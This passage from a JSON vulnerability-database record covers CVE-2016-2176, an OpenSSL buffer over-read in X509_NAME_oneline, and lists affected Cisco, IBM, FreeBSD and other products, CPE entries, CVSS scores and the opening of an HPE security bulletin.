"abyp-4ts-p", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "digital media players series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "43000" }, { "model": "service delivery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.3" }, { "model": "9.3-release-p31", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "telepresence server on multiparty media", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3100" }, { "model": "security proventia network active bypass 0343c3c", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "cloud manager with openstack interim fix1", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "4.3.0.6" }, { "model": "unified ip phones 9.3 sr3", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6901" }, { "model": "digital media manager", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5.3.6" }, { "model": "unified communications manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "11.0(0.98000.225)" }, { "model": "prime network", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "anyconnect secure mobility client for ios", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.3" }, { "model": "prime performance manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "prime collaboration provisioning", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "network analysis module", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "digital media manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5.0" }, { "model": "websphere application server liberty profile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.5" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.12" }, { "model": "unity connection", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.5" }, { "model": "telepresence video communication server", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "8.8" }, { "model": "lancope stealthwatch flowcollector netflow", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "lancope stealthwatch smc", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.8.2" }, { "model": "unified communications manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10.5(1.98991.13)" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.16" }, { "model": "abyp-10g-2sr-2lr-1-p", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "prime optical for sps", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "10.6" }, { "model": "telepresence mcu", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "45000" }, { "model": "telepresence server", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "87104.4" }, { "model": "telepresence isdn gw", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "32410" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.1" }, { "model": "aspera console", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.4" }, { "model": "nexus series switches", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "50008.3" }, { "model": "10.1-release-p31", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "tivoli netcool system service monitors interim fix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.12-04" }, { "model": "netflow generation appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "aspera shares", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.9.2" }, { "model": "telepresence server on multiparty media", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3104.1" }, { "model": "telepresence ex series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "webex meetings server ssl gateway", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "-2.7" }, { "model": "telepresence server on virtual machine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "cognos tm1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2" }, { "model": "cloud manager with openstack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.0.5" }, { "model": "emergency responder", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10.5(1.10000.5)" }, { "model": "webex meetings for android", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "aspera console", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.6" }, { "model": "tivoli composite application manager for transactions if37", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.0.1" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.6" }, { "model": "tivoli network manager ip edition fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.94" }, { "model": "prime license manager", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.5" }, { "model": "commerce experience manager", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "11.0" }, { "model": "unified communications manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "video surveillance series ip cameras", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "70002.8" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.3" }, { "model": "security proventia network active bypass", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.18-42" }, { "model": "expressway series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "8.8" }, { "model": "abyp-4t-0s-0l-p", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "email security appliance", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "10.5" }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "worklight enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.2" }, { "model": "virtual security gateway for microsoft hyper-v vsg2", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.14" }, { "model": "connected grid router cgos 15.6.2.15t", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "wide area application services", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.2.3" }, { "model": "9.3-release-p5", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "tivoli netcool system service monitors interim fix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.12-01" }, { "model": "unified intelligent contact management enterprise", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "nexus series switches 7.3.1nx", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6000" }, { "model": "application and content networking system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mmp server", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3.9.1" }, { "model": "project openssl 1.0.1k", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "9.3-release-p39", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "anyconnect secure mobility client for ios", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "sterling connect:express for unix ifix", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "1.4.6.1146-114" }, { "model": "telepresence mx series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "8.1.2" }, { "model": "aspera console", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.5" }, { "model": "spa232d multi-line dect ata", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1.4.5" }, { "model": "linux -current", "scope": null, "trust": 0.3, "vendor": "slackware", "version": null }, { "model": "tivoli provisioning manager for images build", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.20290.1" }, { "model": "project openssl 1.0.1b", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "telepresence profile series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "8.1.2" }, { "model": "datapower gateways", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.13" }, { "model": "anyconnect secure mobility client for os", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "x4.2" }, { "model": "tivoli netcool system service monitors interim fix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.014-08" }, { "model": "lancope stealthwatch udp director", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.8" }, { "model": "universal small cell series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "70003.5.12.21" }, { "model": "telepresence conductor", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "application policy infrastructure controller", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "jabber for mac", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "globalprotect agent", "scope": "ne", "trust": 0.3, "vendor": "paloaltonetworks", "version": "3.1.1" }, { "model": "dcm series 9900-digital content manager", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "19.0" }, { "model": "10.3-release-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "unified ip phone 9.4.2sr3", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "9951" }, { "model": "video surveillance 4300e/4500e high-definition ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security proventia network active bypass", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1876" }, { "model": "mediasense", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "9.0" }, { "model": "10.3-release-p2", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "local collector appliance", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.2.12" }, { "model": "i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "worklight enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.1" }, { "model": "content security appliance updater servers", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "10.1-release-p29", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "connected analytics for collaboration", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "cognos tm1 interim fix", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.2.0.2" }, { "model": "multicast manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "10.1-release-p23", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2" }, { "model": "telepresence ex series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7.3.7" }, { "model": "mac os security update", "scope": "ne", "trust": 0.3, "vendor": "apple", "version": "x2016" }, { "model": "10.1-release-p16", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "jazz reporting service", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.1" }, { "model": "digital media manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5.1" }, { "model": "nexus series switches", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "50006.2.17" }, { "model": "security proventia network active bypass", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.30.4-12" }, { "model": "webex node for mcs", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "emergency responder 10.5", "scope": null, "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "nexus", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "900012.0" }, { "model": "lancope stealthwatch udp director", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.8.1" }, { "model": "unified communications manager session management edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "lancope stealthwatch flowcollector netflow", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.7.3" }, { "model": "9.3-release-p6", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "video surveillance ptz ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "virtualization experience media engine", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.7(0)" }, { "model": "telepresence serial gateway series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "9.3-release-p9", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "aspera console", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.3" }, { "model": "project openssl 1.0.2c", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "rational tau", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.32" }, { "model": "webex meetings server 2.5mr2", "scope": null, "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "virtual security gateway for microsoft hyper-v", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "services analytic platform", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "jabber for apple ios", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.7" }, { "model": "unified ip phone series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "79009.4(2)" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "89610" }, { "model": "nexus series switches", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "60006.2.17" }, { "model": "tivoli common reporting", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.2" }, { "model": "unified series ip conference phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "88310" }, { "model": "video surveillance media server", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7.9" }, { "model": "unified communications manager", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.5" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "agent for openflow", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.1.5" }, { "model": "10.2-release-p16", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "project openssl 1.0.2h", "scope": "ne", "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "virtual security gateway", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5.2(1)" }, { "model": "unified attendant console enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified contact center express", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "rational tau", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "linux ia-32", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "buildforge", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.1" }, { "model": "cognos insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.2" }, { "model": "policy suite", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "10.0" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1" }, { "model": "digital media manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5.2" }, { "model": "project openssl 1.0.2b", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "prime data center network manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified computing system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "unified communications manager session management edition", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.5" }, { "model": "videoscape control suite", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence mcu", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "53000" }, { "model": "prime access registrar", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7.1" }, { "model": "anyres live", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "9.4.5" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.3.0" }, { "model": "mobilefirst platform foundation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.0" }, { "model": "9.3-release-p34", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "unified communications manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10.0(1)" }, { "model": "tivoli provisioning manager for images system edition build", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "x7.1.1.20290.1" }, { "model": "sterling connect:express for unix ifix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.12150-13" }, { "model": "datapower gateways", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.10" }, { "model": "integration bus", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.0" }, { "model": "jabber software development kit", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.7" }, { "model": "unified contact center express", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.5.1" }, { "model": "webex meetings server mr1", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "2.5" }, { "model": "telepresence mx series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "systems director", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.0.0" }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "2.5.99.2" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.1" }, { "model": "jazz reporting service", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "telepresence isdn gw mse", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "83210" }, { "model": "telepresence profile series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "abyp-2t-0s-2l-p-m", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "visual quality experience tools server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "cloud manager with openstack interim fix", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "4.2.0.3" }, { "model": "rational tau", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.33" }, { "model": "prime access registrar", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7.2" }, { "model": "mysql enterprise backup", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.0.1" }, { "model": "nexus series switches 7.3.1dx", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7000" }, { "model": "asa cx and cisco prime security manager", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "9.5.4.3" }, { "model": "project openssl 1.0.1l", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "im and presence service", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.2" }, { "model": "digital media manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5.3" }, { "model": "9.3-release-p29", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0" }, { "model": "firesight system software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security virtual server protection for vmware", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1" }, { "model": "management appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "cognos insight fp if", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.2.126" }, { "model": "aspera console", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.2" }, { "model": "tivoli provisioning manager for images system edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x7.1.1.0" }, { "model": "unity connection", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "datapower gateways", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.0.1" }, { "model": "cloud object store", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "anyconnect secure mobility client for os", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "x4.0" }, { "model": "project openssl 1.0.1h", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "unified communications manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10.5(2.13900.9)" }, { "model": "ip interoperability and collaboration system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5.0" }, { "model": "unified communications manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10.5(0.98000.88)" }, { "model": "cloud manager with openstack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.0.1" }, { "model": "project openssl 1.0.1p", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null } ], "sources": [ { "db": "BID", "id": "89746" }, { "db": "JVNDB", "id": "JVNDB-2016-002477" }, { "db": "CNNVD", "id": "CNNVD-201605-084" }, { "db": "NVD", "id": "CVE-2016-2176" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2b:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2g:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2:beta3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2:beta1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "1.0.1s", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2:beta2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2016-2176" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Guido Vranken", "sources": [ { "db": "CNNVD", "id": "CNNVD-201605-084" } ], "trust": 0.6 }, "cve": "CVE-2016-2176", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "PARTIAL", "baseScore": 6.4, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "impactScore": 4.9, "integrityImpact": "NONE", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:P", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "Low", "accessVector": "Network", "authentication": "None", "author": "NVD", "availabilityImpact": "Partial", "baseScore": 6.4, "confidentialityImpact": "Partial", "exploitabilityScore": null, "id": "CVE-2016-2176", "impactScore": null, "integrityImpact": "None", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "Medium", "trust": 0.9, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:P", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "NVD", "availabilityImpact": "HIGH", "baseScore": 8.2, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "exploitabilityScore": 3.9, "impactScore": 4.2, "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H", "version": "3.0" }, { "attackComplexity": "Low", "attackVector": "Network", "author": "NVD", "availabilityImpact": "High", "baseScore": 8.2, "baseSeverity": "High", "confidentialityImpact": "Low", "exploitabilityScore": null, "id": "CVE-2016-2176", "impactScore": null, "integrityImpact": "None", "privilegesRequired": "None", "scope": "Unchanged", "trust": 0.8, "userInteraction": "None", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H", "version": "3.0" } ], "severity": [ { "author": "NVD", "id": "CVE-2016-2176", "trust": 1.8, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-201605-084", "trust": 0.6, "value": "HIGH" }, { "author": "VULMON", "id": "CVE-2016-2176", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "VULMON", "id": "CVE-2016-2176" }, { "db": "JVNDB", "id": "JVNDB-2016-002477" }, { "db": "CNNVD", "id": "CNNVD-201605-084" }, { "db": "NVD", "id": "CVE-2016-2176" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "The X509_NAME_oneline function in crypto/x509/x509_obj.c in OpenSSL before 1.0.1t and 1.0.2 before 1.0.2h allows remote attackers to obtain sensitive information from process stack memory or cause a denial of service (buffer over-read) via crafted EBCDIC ASN.1 data. OpenSSL is prone to an information-disclosure vulnerability. \nAn attacker can exploit this issue to gain access to sensitive information that may aid in further attacks. \nFollowing product versions are affected:\nOpenSSL versions 1.0.2 prior to 1.0.2h\nOpenSSL versions 1.0.1 prior to 1.0.1t. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\nNote: the current version of the following document is available here:\nhttps://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03756en_us\n\nSUPPORT COMMUNICATION - SECURITY BULLETIN\n\nDocument ID: hpesbhf03756en_us\nVersion: 1\n\nHPESBHF03756 rev.1 - HPE Network Products including Comware 7, iMC, and VCX\nrunning OpenSSL, Remote Denial of Service (DoS), Disclosure of Sensitive\nInformation\n\nNOTICE: The information in this Security Bulletin should be acted upon as\nsoon as possible. \n\nRelease Date: 2017-06-05\nLast Updated: 2017-06-05\n\nPotential Security Impact: Remote: Denial of Service (DoS), Disclosure of\nSensitive Information\n\nSource: Hewlett Packard Enterprise, Product Security Response Team\n\nVULNERABILITY SUMMARY\nPotential security vulnerabilities with OpenSSL have been addressed for HPE\nnetwork products including Comware 7, iMC, and VCX. The vulnerabilities could\nbe remotely exploited resulting in Denial of Service (DoS) or disclosure of\nsensitive information. \n\nReferences:\n\n - CVE-2016-2105 - Remote Denial of Service (DoS)\n - CVE-2016-2106 - Remote Denial of Service (DoS)\n - CVE-2016-2107 - Remote disclosure of sensitive information\n - CVE-2016-2108 - Remote Denial of Service (DoS)\n - CVE-2016-2109 - Remote Denial of Service (DoS)\n - CVE-2016-2176 - Remote Denial of Service (DoS)\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \n\n - VCX Products All versions - Please refer to the RESOLUTION below for a\nlist of updated products. \n - Comware v7 (CW7) Products All versions - Please refer to the RESOLUTION\nbelow for a list of updated products. \n - HP Intelligent Management Center (iMC) All versions - Please refer to the\nRESOLUTION below for a list of updated products. \n\nBACKGROUND\n\n CVSS Base Metrics\n 